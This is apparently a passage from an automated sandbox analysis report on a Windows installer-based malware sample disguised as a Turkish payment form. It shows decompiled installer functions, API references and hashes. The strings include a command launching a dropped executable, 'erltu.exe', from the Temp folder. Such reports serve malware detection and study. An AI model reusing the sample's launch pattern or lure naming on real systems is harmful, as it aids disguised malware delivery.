0x004021c4
0x00000000
0x00000000
0x00000000
0x004021af
0x004021ba
0x0040291d
0x00402929

APIs

CoCreateInstance.OLE32(00407380,?,00000001,00407370,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020CB
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,0040A800,00000400,?,00000001,00407370,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402187

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402103

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-501415292
Opcode ID: 99d1c9485c2385a05d6def83f54491c2fe2eae754645da680941b60363c3e806
Instruction ID: 398a92e667fa01929b708865028928fdc90e398ffceaacaabec111818001f34d
Opcode Fuzzy Hash: 99d1c9485c2385a05d6def83f54491c2fe2eae754645da680941b60363c3e806
Instruction Fuzzy Hash: 96418E75A00204BFCB04EFA4CD88E9E7BB5EF89314B204169F905EB2D1CB799D41CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00405DDA Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DDA(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t2 = _t9 + 0x409298; // 0x4b004178
				_t7 =  *_t2;
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					_t3 = _t9 + 0x40929c; // 0x454e5245
					return GetProcAddress(_t5,  *_t3);
				}
				_t5 = LoadLibraryA(_t7);
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405de2
0x00405de5
0x00405de5
0x00405dec
0x00405df4
0x00405e01
0x00405e01
0x00000000
0x00405e08
0x00405df7
0x00405dff
0x00000000
0x00000000
0x00405e10

APIs

GetModuleHandleA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DEC
LoadLibraryA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DF7
GetProcAddress.KERNEL32(00000000,454E5245), ref: 00405E08

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 48fff7582a584f5b534c5f4fb96ac49351284891df118ff32f91dc10e886df39
Instruction ID: 23adcdfa12f808958732e8448d219f11259a2274de98c66bb9e29e692012a426
Opcode Fuzzy Hash: 48fff7582a584f5b534c5f4fb96ac49351284891df118ff32f91dc10e886df39
Instruction Fuzzy Hash: 27E0C232A08510ABD7118B20ED48D6B73ADEF897403080C3EF549F6190C734ED91EBEA

Uniqueness

Uniqueness Score: -1.00%

Function 004026A1 Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004026A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A85(2), _t19 - 0x194) != 0xffffffff) {
					E00405A52(__edi, _t6);
					_push(_t19 - 0x168);
					_push(__esi);
					E00405AF4();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004026b9
0x004026cd
0x004026d8
0x004026d9
0x00402840
0x004026bb
0x004026bb
0x004026bd
0x004026bf
0x004026bf
0x0040291d
0x00402929

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026B0

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 13df6a17cce9b71cc0419ccd618343e2ee757eb231b356d374ab3b7a298b65eb
Instruction ID: 8527613b08e3aea83d48894234c8ec001628bfbd33843c806f329a49b4271005
Opcode Fuzzy Hash: 13df6a17cce9b71cc0419ccd618343e2ee757eb231b356d374ab3b7a298b65eb
Instruction Fuzzy Hash: 5DF0A7726051009BD700EBA49E49AEF7768DF11314F60057BE141F20C1D6B84A42DB2A

Uniqueness

Uniqueness Score: -1.00%

Function 0040403D Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040403D(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420510 =  *0x420510 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F5C(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422ec0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f24, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f24, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420510 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd00 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403F17(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004042C8();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x4236fc; // 0x6df5dc
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423f58; // 0x6df098
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00404009;
				E00403EF5(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403EF5(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403F17( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403F2A(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423f28; // 0x6ddfd8
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420510 =  *0x420510 & 0x00000000;
				return 0;
			}

0x0040404d
0x00404173
0x004041cf
0x004041d3
0x004042aa
0x004042ac
0x004042ac
0x004042b2
0x004042b2
0x004042b5
0x00000000
0x004042bc
0x004041e1
0x004041e3
0x004041ed
0x004041f8
0x004041fb
0x004041fe
0x00404209
0x0040420c
0x00404213
0x00404221
0x00404239
0x0040424c
0x0040425c
0x0040425e
0x0040425e
0x00404213
0x00404268
0x00000000
0x00404273
0x00404277
0x00404288
0x00404288
0x0040428e
0x0040429c
0x0040429c
0x00000000
0x004042a0
0x00404268
0x0040417e
0x00000000
0x00404192
0x00404198
0x0040419e
0x00000000
0x00000000
0x004041c3
0x004041c5
0x004041ca
0x00000000
0x004041ca
0x0040417e
0x00404053
0x00404056
0x0040405b
0x0040405d
0x0040406c
0x0040406c
0x0040406e
0x00404073
0x00404076
0x00404078
0x0040407d
0x00404086
0x0040408c
0x00404098
0x0040409b
0x004040a4
0x004040a9
0x004040ac
0x004040b1
0x004040c8
0x004040cf
0x004040e2
0x004040e5
0x004040fa
0x004040fc
0x00404101
0x00404106
0x0040410b
0x0040410b
0x0040411a
0x00404129
0x0040412b
0x00404141
0x00404150
0x00404152
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040C8
GetDlgItem.USER32 ref: 004040DC
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004040FA
GetSysColor.USER32(?), ref: 0040410B
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040411A
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404129
lstrlenA.KERNEL32(?), ref: 00404133
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404141
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404150
GetDlgItem.USER32 ref: 004041B3
SendMessageA.USER32(00000000), ref: 004041B6
GetDlgItem.USER32 ref: 004041E1
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404221
LoadCursorA.USER32 ref: 00404230
SetCursor.USER32(00000000), ref: 00404239
ShellExecuteA.SHELL32(0000070B,open,00422EC0,00000000,00000000,00000001), ref: 0040424C
LoadCursorA.USER32 ref: 00404259
SetCursor.USER32(00000000), ref: 0040425C
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404288
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040429C

Strings

open, xrefs: 00404244
C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph, xrefs: 0040420C
N, xrefs: 004041CF
@@, xrefs: 00404241

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: @@$C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph$N$open
API String ID: 3615053054-3826969958
Opcode ID: f2281ac8f2863318c5f22e1f494ebc6a86efa03034e808f678c97fda4e75fe7b
Instruction ID: 2736236621597dd84b1265fd00406a521608d9db3f880d2da7511b3895ae30a3
Opcode Fuzzy Hash: f2281ac8f2863318c5f22e1f494ebc6a86efa03034e808f678c97fda4e75fe7b
Instruction Fuzzy Hash: 0161D1B1A40309BBEB109F60DC45B6A7BB9FB44715F10407AFB05BA2D1C7B8A9518F98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f28; // 0x6ddfd8
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "fjvkkubvvke Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423f24; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x00401019
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,?), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,fjvkkubvvke Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
fjvkkubvvke Setup, xrefs: 00401150

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$fjvkkubvvke Setup
API String ID: 941294808-4136274821
Opcode ID: 300c992b054546ef250a4cd2a637f7cc88d786b6e53a18a04d6cd460370d2829
Instruction ID: 28e048358fdb56e3a71f0bf3a5ff7a413e245bc8018749bf15ad205f69265f0b
Opcode Fuzzy Hash: 300c992b054546ef250a4cd2a637f7cc88d786b6e53a18a04d6cd460370d2829
Instruction Fuzzy Hash: 4241BA71804249AFCB058FA4DD459BFBBB9FF48315F00802AF951AA1A0C738AA50DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405842 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00405842() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DDA(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423fb0 =  *0x423fb0 + 1;
						return _t20;
					}
				}
				 *0x4226c0 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422138, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d38, "%s=%s\r\n", 0x4226c0, 0x422138);
						_t18 =  *0x423f28; // 0x6ddfd8
						_t56 = _t55 + 0x10;
						_push( *((intOrPtr*)(_t18 + 0x128)));
						_push(0x422138);
						E00405B16(_t43, 0x400, 0x422138);
						_t20 = E004057CB(0x422138, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405740(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405740(_t26 + 0xa, 0x4093a0);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040578C(_t51 + _t29, 0x421d38, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405AF4(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004057CB(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x4226c0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x00405848
0x0040584f
0x00405853
0x0040585c
0x00405860
0x0040599f
0x0040599f
0x00000000
0x0040599f
0x00405860
0x0040586c
0x00405882
0x004058aa
0x004058b5
0x004058b9
0x004058d9
0x004058db
0x004058e0
0x004058e3
0x004058e9
0x004058ea
0x004058f7
0x004058fc
0x00405901
0x00405905
0x00000000
0x00000000
0x00405914
0x00405916
0x00405923
0x00405927
0x00405998
0x00405999
0x00000000
0x00405943
0x00405950
0x004059b5
0x004059bc
0x00405963
0x00405963
0x00405965
0x0040596e
0x00405979
0x0040598b
0x00405992
0x00000000
0x00405992
0x004059be
0x004059bf
0x004059c4
0x004059c6
0x004059d3
0x004059d3
0x004059d7
0x00000000
0x00000000
0x00000000
0x00000000
0x004059c8
0x004059c8
0x004059cb
0x004059ce
0x004059cf
0x00000000
0x004059c8
0x0040595b
0x00405960
0x00000000
0x00405960
0x00405927
0x00405884
0x0040588f
0x00405898
0x0040589c
0x00000000
0x00000000
0x0040589c
0x004059a9

APIs

Part of subcall function 00405DDA: GetModuleHandleA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DEC
Part of subcall function 00405DDA: LoadLibraryA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DF7
Part of subcall function 00405DDA: GetProcAddress.KERNEL32(00000000,454E5245), ref: 00405E08

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 0040588F
GetShortPathNameA.KERNEL32 ref: 00405898
GetShortPathNameA.KERNEL32 ref: 004058B5
wsprintfA.USER32 ref: 004058D3
GetFileSize.KERNEL32(00000000,00000000,00422138,C0000000,00000004,00422138,?,004055D7,?,00000000,000000F1,?), ref: 0040590E
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040591D
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405933
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D38,00000000,-0000000A,004093A0,00000000,[Rename]), ref: 00405979
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040598B
GlobalFree.KERNEL32 ref: 00405992
CloseHandle.KERNEL32(00000000), ref: 00405999

Part of subcall function 00405740: lstrlenA.KERNEL32(?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405747
Part of subcall function 00405740: lstrlenA.KERNEL32(?,?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405777

Strings

[Rename], xrefs: 00405943, 00405955
8!B, xrefs: 004058AA
%s=%s, xrefs: 004058C9

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$8!B$[Rename]
API String ID: 3772915668-1989604195
Opcode ID: e496e12908088595564ff6a64c263822f6cf314b86cdf927852dc462a35614f3
Instruction ID: 485c0dd97f26b0c044a9bc16f28733e4b9e22d15a5ab270111e081fcc94942a4
Opcode Fuzzy Hash: e496e12908088595564ff6a64c263822f6cf314b86cdf927852dc462a35614f3
Instruction Fuzzy Hash: 6F4102B1604B01BBE7206B659D49F6B3A6CDF45725F04043AFA05F62D1E67CA8018EBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405B16 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 170
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405B16(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _t30;
				CHAR* _t31;
				signed int _t33;
				signed int _t34;
				signed int _t45;
				char _t47;
				CHAR* _t57;
				char _t61;
				signed int _t63;
				intOrPtr _t67;
				signed int _t75;
				char* _t76;
				signed int _t84;
				signed int _t86;
				void* _t87;

				_t75 = _a8;
				if(_t75 < 0) {
					_t67 =  *0x4236fc; // 0x6df5dc
					_t75 =  *(_t67 - 4 + _t75 * 4);
				}
				_t30 =  *0x423f58; // 0x6df098
				_t76 = _t75 + _t30;
				_t31 = 0x422ec0;
				_t57 = 0x422ec0;
				if(_a4 - 0x422ec0 < 0x800) {
					_t57 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t61 =  *_t76;
					_a11 = _t61;
					if(_t61 == 0) {
						break;
					}
					__eflags = _t57 - _t31 - 0x400;
					if(_t57 - _t31 >= 0x400) {
						break;
					}
					_t76 = _t76 + 1;
					__eflags = _t61 - 0xfc;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t57 = _t61;
							_t57 =  &(_t57[1]);
							__eflags = _t57;
						} else {
							 *_t57 =  *_t76;
							_t57 =  &(_t57[1]);
							_t76 = _t76 + 1;
						}
						continue;
					}
					_t33 =  *((char*)(_t76 + 1));
					_t63 =  *_t76;
					_t84 = (_t33 & 0x0000007f) << 0x00000007 | _t63 & 0x0000007f;
					_v24 = _t63;
					_v16 = _t33;
					_t34 = _t33 | 0x00008000;
					_v20 = _t63 | 0x00008000;
					_t76 = _t76 + 2;
					__eflags = _a11 - 0xfe;
					_v12 = _t34;
					if(_a11 != 0xfe) {
						__eflags = _a11 - 0xfd;
						if(_a11 != 0xfd) {
							__eflags = _a11 - 0xff;
							if(_a11 == 0xff) {
								__eflags = (_t34 | 0xffffffff) - _t84;
								E00405B16(_t57, _t76, _t84, _t57, (_t34 | 0xffffffff) - _t84);
							}
							L32:
